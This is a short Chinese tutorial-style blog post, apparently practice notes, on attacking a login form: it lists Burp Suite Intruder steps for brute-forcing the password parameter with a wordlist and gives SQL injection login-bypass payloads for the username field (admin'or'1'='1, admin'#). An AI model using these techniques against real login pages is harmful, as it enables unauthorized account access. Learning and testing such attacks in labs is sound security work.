1.利用burpsuite爆破
- 抓包
- ctrl+I将包复制到intruder模块,因为要对password参数进行爆破,所以在password参数的内容两边加$
- 选中Payloads,载入字典,点击Start attack进行爆破
2.手工sql注入
- username:
admin'or'1'='1
-username:admin'#
admin'or'1'='1
admin'#
本文标题:6.暴力破解
本文链接:https://www.haomeiwen.com/subject/teoowxtx.html
网友评论